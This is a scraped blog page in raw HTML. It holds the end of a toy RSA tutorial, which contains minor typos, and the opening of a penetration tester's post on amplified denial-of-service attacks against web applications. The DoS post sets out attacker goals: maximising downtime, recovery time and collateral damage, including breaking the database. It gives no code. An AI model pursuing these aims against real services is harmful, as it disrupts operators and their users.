<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
</w:LatentStyles>
</xml><![endif]-->
<!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin:0cm;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:"Times New Roman";}
</style>
<![endif]-->
<!--StartFragment-->
</span><br />
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><b>Note: </b>And the encryption is
successful. User A is the only person that can decrypt the secret integer <b><i>m. </i></b> <o:p></o:p></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span><br />
<div class="MsoNormal">
<br /></div>
<b><span style="font-size: large;">RSA Decryption</span></b><br />
<h1>
<span style="font-size: small; font-weight: normal;">RSA Cryptographic User A can recover m from c by using her private key exponent d by the following computation:</span></h1>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0cj9aBhkKj4WiJoXk8oVq-ftrTNBHX4Oonw4J-CFLlKhJb7bejaqBGDIQVP9k8axYWro5Q-4SgTwtdsfNZfxXJVAlMwHISrFHfJ_a0rdKbw8cqbJAsOb8ubxg1xlSNP4XWdTGGzOTun0/s1600/c6.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0cj9aBhkKj4WiJoXk8oVq-ftrTNBHX4Oonw4J-CFLlKhJb7bejaqBGDIQVP9k8axYWro5Q-4SgTwtdsfNZfxXJVAlMwHISrFHfJ_a0rdKbw8cqbJAsOb8ubxg1xlSNP4XWdTGGzOTun0/s1600/c6.png" /></a></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><span lang="EN-GB"><br /></span></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
<!--EndFragment--></span></div>
<div class="MsoNormal">
<b style="font-family: Times, 'Times New Roman', serif;"><br /></b><b style="font-family: Times, 'Times New Roman', serif;">Note: </b><span style="font-family: Times, 'Times New Roman', serif;">Given </span><span class="texhtml" style="font-family: Times, 'Times New Roman', serif;"><i>m</i></span><span style="font-family: Times, 'Times New Roman', serif;">, he can recover the original message </span><b style="font-family: Times, 'Times New Roman', serif;">m</b><span style="font-family: Times, 'Times New Roman', serif;"> by using
the agreed-upon reversible procedure.</span></div>
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span><br />
<div class="MsoNormal">
<br />
<b><span style="font-size: large;">RSA Encryption/Decryption Simple example</span></b></div>
<div class="MsoNormal">
<span style="font-family: Times, 'Times New Roman', serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Times, 'Times New Roman', serif;">For the purposes of
this paper we are going to use a very simple number example. Based on Example 4
we have to:</span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><br /></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="MsoNormal" style="margin-left: 18.0pt; mso-list: l1 level1 lfo1; tab-stops: list 18.0pt; text-indent: -18.0pt;">
<!--[if !supportLists]--><span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">1.<span style="font-size: 7pt;">
</span><!--[endif]-->Choose <b><i>q = 47</i></b>
and <b><i>q
= 73</i></b>. Based in mathematical relationship </span><span class="Apple-style-span" style="font-family: Times, 'Times New Roman', serif;">(b) is n = pq => <b><span style="color: #ff6600;">n = 3431</span></b> also from relationship (c) we
conclude that:</span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="MsoNormal" style="margin-left: 18.0pt;">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">(c) => <i> </i><i><span lang="EL">φ</span></i><span lang="EN-GB">(<i>pq</i>) = (<i>p</i> − 1)(<i>q</i> − 1)
or </span><i><span lang="EL">φ</span></i><span lang="EN-GB">(<i>n</i>) = </span><i><span lang="EL">φ</span></i><span lang="EN-GB">(<i>pq</i>) = </span><i><span lang="EL">φ</span></i><span lang="EN-GB">(<i>6</i>) = (73-1)(47-1) = 72*46 = 3312
=> </span><b><i><span lang="EL" style="color: #ff6600;">φ</span></i></b><b><span lang="EN-GB" style="color: #ff6600; mso-ansi-language: EN-GB;"> = 3312</span></b></span><br />
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><b><span lang="EN-GB" style="color: #ff6600; mso-ansi-language: EN-GB;"><br /></span></b></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="MsoNormal" style="margin-left: 18.0pt; mso-list: l1 level1 lfo1; tab-stops: list 18.0pt; text-indent: -18.0pt;">
<!--[if !supportLists]--><span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><span lang="EN-GB">2.<span style="font-size: 7pt;">
</span></span><!--[endif]--><span lang="EN-GB">Now
that we have <i>n</i> and </span><i><span lang="EL">φ</span></i><span lang="EN-GB">, we should discard <i>p</i> and <i>q,</i> and
destroy any trace of their existence.</span></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="MsoNormal" style="margin-left: 18.0pt; mso-list: l1 level1 lfo1; tab-stops: list 18.0pt; text-indent: -18.0pt;">
<!--[if !supportLists]--><span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><span lang="EN-GB">3.<span style="font-size: 7pt;">
</span></span><!--[endif]--><span lang="EN-GB">Next,
we randomly select a number <i>e</i></span><i>, that </i><span class="texhtml"><i><span lang="EN-GB">e</span></i></span><span class="texhtml"><span lang="EN-GB"> > 1</span></span><span lang="EN-GB"> and <i>e</i> is coprime [16] to <b>3312 </b>(which
is<i> </i></span><i><span lang="EL">φ</span></i><b><span lang="EN-GB">)</span></b><span lang="EN-GB">. </span></span><span style="font-family: Times, 'Times New Roman', serif;">We choose </span><b style="font-family: Times, 'Times New Roman', serif;"><i><span style="color: #ff6600;">e = 425</span></i></b></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="MsoNormal" style="margin-left: 18.0pt; mso-list: l1 level1 lfo1; tab-stops: list 18.0pt; text-indent: -18.0pt;">
<!--[if !supportLists]--><span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><span lang="EN-GB">4.<span style="font-size: 7pt;">
</span></span><!--[endif]--><span lang="EN-GB">Then
the modular inverse of <i>e</i> is calculated to be the following: <b><i><span style="color: #ff6600;">d = 1769</span></i></b></span></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="MsoNormal" style="margin-left: 18.0pt; mso-list: l1 level1 lfo1; tab-stops: list 18.0pt; text-indent: -18.0pt;">
<!--[if !supportLists]--><span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><span lang="EN-GB">5.<span style="font-size: 7pt;">
</span></span><!--[endif]--><span lang="EN-GB">We
now keep <i>d</i> private and make <i>e</i> and <i>n</i> public.</span></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div style="margin-left: 18.0pt; mso-list: l1 level1 lfo1; tab-stops: list 18.0pt; text-indent: -18.0pt;">
<!--[if !supportLists]--><span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><span lang="EN-GB">6.<span style="font-size: 7pt;">
</span></span><!--[endif]--><span lang="EN-GB">Assume
that we have plaintext data represented by the following simple number:<o:p></o:p></span></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div style="text-indent: 18.0pt;">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><i><span style="color: #ff6600; mso-ansi-language: EN-US;">P</span><span lang="EL" style="color: #ff6600;">laintext = 707</span></i></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div style="margin-left: 18.0pt; mso-list: l1 level1 lfo1; tab-stops: list 18.0pt; text-indent: -18.0pt;">
<!--[if !supportLists]--><span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><span lang="EN-GB">7.<span style="font-size: 7pt;">
</span></span><!--[endif]--><span lang="EN-GB">The
encrypted data is computed by <i>c</i> = <i>m<sup>e</sup></i> (mod <i>n</i>) as
follows: <o:p></o:p></span></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div style="text-indent: 18.0pt;">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><b><i><span lang="EL" style="color: #ff6600;">Cipher</span></i></b><b><i><span lang="EL" style="color: #ff6600; mso-ansi-language: EN-US;"> </span><span lang="EL" style="color: #ff6600;">text = 707^425(mod 3431) = 2142</span></i></b></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div style="margin-left: 18.0pt; mso-list: l1 level1 lfo1; tab-stops: list 18.0pt; text-indent: -18.0pt;">
<!--[if !supportLists]--><span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><span lang="EN-GB">8.<span style="font-size: 7pt;">
</span></span><!--[endif]--><span lang="EN-GB">The
cipher text value cannot be easily reverted back to the original plaintext
without knowing <i>d</i> (or, equivalently, knowing the values of <i>p</i> and <i>q</i>).
With larger bit sizes, this task grows exponentially in difficulty. If,
however, you are privy to the secret information that <i>d</i> = 1769, then the
plaintext is easily retrieved using <i>m</i>
= <i>c <sup>d</sup></i>(mod <i>n</i>) as follows: <o:p></o:p></span></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div style="text-indent: 18.0pt;">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><b><i><span lang="EN-GB" style="color: #ff6600; mso-ansi-language: EN-GB;">Plaintext = 2142^1769(mod 3431) = 707</span></i></b></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<br />
<b><span style="font-size: large;">Why RSA can’t break</span></b><br />
<br />
The security of the RSA cryptosystem is based on two mathematical problems:<br />
<span lang="EN-GB" style="font-family: Times, 'Times New Roman', serif;">
</span><br />
<ol class="ol1"><span lang="EN-GB" style="font-family: Times, 'Times New Roman', serif;">
<li class="li1">The problem of factoring large numbers</li>
<li class="li1">The RSA problem.</li>
</span></ol>
<span lang="EN-GB" style="font-family: Times, 'Times New Roman', serif;">In number
theory, <b>integer factorization</b> or <b>prime factorization</b> is the
breaking down of a composite number into smaller non-trivial divisors, which
when multiplied together equal the original integer. [17] </span><span lang="EN-GB" style="font-family: Times, 'Times New Roman', serif;">In
cryptography, the <b>RSA problem</b> summarizes the task of performing an RSA
private-key operation given only the public key. [18] </span><span style="font-family: Times, 'Times New Roman', serif;">Full
decryption of an RSA cipher text is thought to be infeasible on the assumption
that both of these problems are hard because no efficient algorithm exists for
solving them.</span><br />
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><br /></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<b><span style="font-size: large;">Appendix</span></b> <br />
<br />
<b>C</b><br />
<b style="font-family: Times, 'Times New Roman', serif;"><span lang="EN-GB"><br /></span></b>
<b style="font-family: Times, 'Times New Roman', serif;"><span lang="EN-GB">Cryptography:</span></b><span lang="EN-GB" style="font-family: Times, 'Times New Roman', serif;"> Is the process of converting ordinary
information (plaintext) into unintelligible gibberish.</span><br />
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><br /></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><b><span lang="EN-GB">Cipher:</span></b><span lang="EN-GB"> Is unintelligible gibberish<o:p></o:p></span></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><br /></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><b><span lang="EN-GB">Coprime:</span></b><span lang="EN-GB"> In mathematics, two integers <i>a</i> and <i>b</i>
are said to be <b>coprime</b> or <b>relatively prime</b> if they have no common
positive factor other than 1 or, equivalently, if their greatest common divisor
is 1. [16]</span></span><br />
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><b><br /></b>
<b>D</b></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><br /></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><b><span lang="EN-GB">Decryption:</span></b><span lang="EN-GB"> Is the reverse process of encryption</span></span><br />
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><br /></span>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><b>M</b></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><br /></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
<div class="MsoNormal">
<b><span lang="EN-GB">Multiplicative
inverse</span></b><span lang="EN-GB">: In
mathematics, a <b>multiplicative inverse</b> or <b>reciprocal</b> for a number <i>x</i>,
denoted by <sup>1</sup>⁄<i><sub>x</sub></i> or <i>x</i> <sup>−1</sup>, is a
number which when multiplied by <i>x</i> yields the multiplicative identity, 1.
[15]</span><br />
<b><br /></b>
<b>P</b></div>
</span><span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b><span lang="EN-GB">Plaintext: </span></b><span lang="EN-GB">Is ordinary readable information <o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b><span lang="EN-GB">Problem of factoring large numbers: </span></b><span lang="EN-GB">In number theory, <b>integer
factorization</b> or <b>prime factorization</b> is the breaking down of a
composite number into smaller non-trivial divisors, which when multiplied
together equal the original integer. [17]<b><o:p></o:p></b></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b><span lang="EN-GB">Prime numbers: </span></b><span lang="EN-GB">In mathematics, a <b>prime number</b> (or a <b>prime</b>)
is a natural number that has exactly two <i>distinct</i> natural number
divisors: 1 and itself. [13]<b><o:p></o:p></b></span></div>
<h3>
<span style="font-size: large;"><br /></span></h3>
<h3>
<span style="font-size: large;">References</span></h3>
<div class="MsoNormal">
<b><span lang="EN-GB">[1]:</span></b><span lang="EN-GB"> <a href="http://www.bb.ustc.edu.cn/ocw/NR/rdonlyres/Electrical-Engineering-and-Computer-Science/6-875Spring-2005/0F52083E-BDFB-45A5-B804-3C186AFC80B3/0/chp_lock_binary.jpg">http://www.bb.ustc.edu.cn/ocw/NR/rdonlyres/Electrical-Engineering-and-Computer-Science/6-875Spring-2005/0F52083E-BDFB-45A5-B804-3C186AFC80B3/0/chp_lock_binary.jpg</a></span><b><span lang="EN-GB"> <o:p></o:p></span></b></div>
<div class="MsoNormal">
<b><span lang="EN-GB">[2]: </span></b>Liddell and
Scott's Greek-English Lexicon. Oxford University Press. (1984)</div>
<div class="MsoNormal">
<b><span lang="EN-GB">[3]: </span></b><a href="http://www.switch.ch/export/sites/default/uni/projects/grid/download_repository/crypt%20o1.png">http://www.switch.ch/export/sites/default/uni/projects/grid/download_repository/crypt
o1.png</a></div>
<div class="MsoNormal">
<b><span lang="EN-GB">[4]: </span></b><span lang="EN-GB"> <a href="http://en.wikipedia.org/wiki/Cryptography#cite_note-0">http://en.wikipedia.org/wiki/Cryptography#cite_note-0</a></span></div>
<div class="MsoNormal">
<b><span lang="EN-GB">[5]: </span></b><span lang="EN-GB"> </span><a href="http://en.wikipedia.org/wiki/Symmetric-key_algorithm">http://en.wikipedia.org/wiki/Symmetric-key_algorithm</a></div>
<div class="MsoNormal">
<o:p></o:p></div>
<div class="MsoNormal">
<b><span lang="EN-GB">[6]: </span></b><span lang="EN-GB"> </span><a href="http://en.wikipedia.org/wiki/Public-key_cryptography">http://en.wikipedia.org/wiki/Public-key_cryptography</a></div>
<div class="MsoNormal">
<o:p></o:p></div>
<div class="MsoNormal">
<b><span lang="EN-GB">[7]: </span></b><span lang="EN-GB"> </span><a href="http://www.codeproject.com/KB/cs/SecuringData.aspx">http://www.codeproject.com/KB/cs/SecuringData.aspx</a></div>
<div class="MsoNormal">
<o:p></o:p></div>
<div class="MsoNormal">
<b><span lang="EN-GB">[8]: </span></b><span lang="EN-GB"> </span><a href="http://en.wikipedia.org/wiki/RSA">http://en.wikipedia.org/wiki/RSA</a></div>
<div class="MsoNormal">
<o:p></o:p></div>
<div class="MsoNormal">
<b><span lang="EN-GB">[9]: </span></b><span lang="EN-GB"> </span><a href="http://www.rsa.com/press_release.aspx?id=261">http://www.rsa.com/press_release.aspx?id=261</a></div>
<div class="MsoNormal">
<o:p></o:p></div>
<div class="MsoNormal">
<b><span lang="EN-GB">[10]: </span></b><span lang="EN-GB"> <a href="http://www.rsa.com/node.aspx?id=1012">http://www.rsa.com/node.aspx?id=1012</a></span></div>
<div class="MsoNormal">
<b><span lang="EN-GB">[11]: </span></b><span lang="EN-GB"> <a href="http://en.wikipedia.org/wiki/Euler%27s_totient_function">http://en.wikipedia.org/wiki/Euler%27s_totient_function</a></span></div>
<div class="MsoNormal">
<b><span lang="EN-GB">[12]: </span></b><span lang="EN-GB"> <a href="http://en.wikipedia.org/wiki/Extended_Euclidean_algorithm">http://en.wikipedia.org/wiki/Extended_Euclidean_algorithm</a></span></div>
<div class="MsoNormal">
<b><span lang="EN-GB">[13]: </span></b><span lang="EN-GB"> <a href="http://en.wikipedia.org/wiki/Prime_number">http://en.wikipedia.org/wiki/Prime_number</a></span></div>
<div class="MsoNormal">
<b><span lang="EN-GB">[14]: </span></b><span lang="EN-GB"><a href="http://www.informit.com/articles/article.aspx?p=102212&seqNum=4">http://www.informit.com/articles/article.aspx?p=102212&seqNum=4</a></span></div>
<div class="MsoNormal">
<b><span lang="EN-GB">[15]: </span></b><span lang="EN-GB"> <a href="http://en.wikipedia.org/wiki/Multiplicative_inverse">http://en.wikipedia.org/wiki/Multiplicative_inverse</a></span></div>
<div class="MsoNormal">
<b><span lang="EN-GB">[16]: </span></b><span lang="EN-GB"> <a href="http://en.wikipedia.org/wiki/Coprime">http://en.wikipedia.org/wiki/Coprime</a></span></div>
<div class="MsoNormal">
<b><span lang="EN-GB">[17]: </span></b><span lang="EN-GB"> <a href="http://en.wikipedia.org/wiki/Integer_factorization">http://en.wikipedia.org/wiki/Integer_factorization</a></span></div>
<div class="MsoNormal">
<b><span lang="EN-GB">[18]: </span></b><span lang="EN-GB"> <a href="http://en.wikipedia.org/wiki/RSA_problem">http://en.wikipedia.org/wiki/RSA_problem</a></span></div>
<div class="MsoNormal">
<b><span lang="EN-GB">[19]: </span></b><span lang="EN-GB"> <a href="http://www.cl.cam.ac.uk/~rnc1/brute.html">http://www.cl.cam.ac.uk/~rnc1/brute.html</a></span></div>
<!--EndFragment--></span></div>
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><br /></span></div>
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><br /></span></div>
<div class="MsoNormal">
<span lang="EN-GB"><br /></span></div>
<!--EndFragment--></div>
<!--EndFragment--><div class="blogger-post-footer">Penetest Horror Blog</div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-7947080244954191821.post-84763174339035799952012-10-21T13:18:00.002-07:002012-10-30T14:51:16.732-07:00Bloody Death DoS-ing <b>Introduction</b><br />
<br />
In this article I am going to explain how to perform an amplified Denial Of Service (DoS) attack on a Web Application in a high level manner, but you should be aware that these are real world scenarios that I have implemented during costumer penetration tests. A successful DoS attack on a Web Application should happen in three different layers, the Web Application, the Web Application platform and the Web Server itself. It is common knowledge of course that you don't have to attack all three layers to successfully compromise the availability of a Web Server, but optimizing a DoS attack should be desirable from the perspective of an attacker. By using the word optimize I mean three things: <br />
<ol>
<li>Reduce to minimum the amount of the machines generating malicious traffic.</li>
<li>Increase the amount Web Server downtime. </li>
<li>Increase the amount of remediation time (e.g. recover time).</li>
<li>Increase collateral damage (e.g. break the database). </li>
</ol>
But first I should explain what DoS attack means, in computing, a denial-of-service attack (DoS attack) or distributed denial-of-service attack (DDoS attack) is an attempt to make a machine or network resource unavailable to its intended users. Although the means to carry out, motives for, and targets of a DoS attack may vary, it generally consists of the efforts of one or more people to temporarily or indefinitely interrupt or suspend services of a host connected to the Internet.<br />
<br />
<b><b>Why talk about DoS/DDoS attacks</b></b><br />
<br />
These attacks
have become much more widespread and common in recent years and it is
not just the major corporations that are being targeted. Many are now
being focused on small and medium businesses as it is here that they
stand the most chance of launching a successful attack as well as
bringing the most havoc and chaos. The truth is that there is probably a
vast majority of websites that do not currently have some type of DDoS
attack protection and they will only suffer as a result.<br />
<br />
Network-layer
DDoS attacks are a popular tactic among hacktivists because they are
generally low-tech and easy to carry out. The attacks typically employ a
barrage of requests directed at a web server at a high frequency which
can cause disruptions, rendering the targeted website inaccessible. Analyzing traffic can be a
laborious undertaking, and reducing the volume of data to sift through
with a first line of defense can prove advantageous in maintaining a
robust network security stance. <br />
<br />
Financial firms were in
the crosshairs of cyber-attackers during the first three months of
2012, while a threefold increase in DDoS attacks was recorded. DDoS
mitigation biz Prolexic reports that <u>the growth in the number of
attacks against its clients in banking and insurance was accompanied by a
3,000 per cent increase in malicious packet traffic (up from 14 billion
packets of malicious traffic in Q4 2011 to 1.1 trillion in Q1 2012).</u><b> </b><br />
<br />
<b>Methods of performing a DoS or DDoS attack</b><br />
<br />
A "denial-of-service" attack is characterized by an explicit attempt by attackers to prevent legitimate users of a service from using that service. There are two general forms of DoS attacks: those that crash services and those that flood services.<br />
<br />
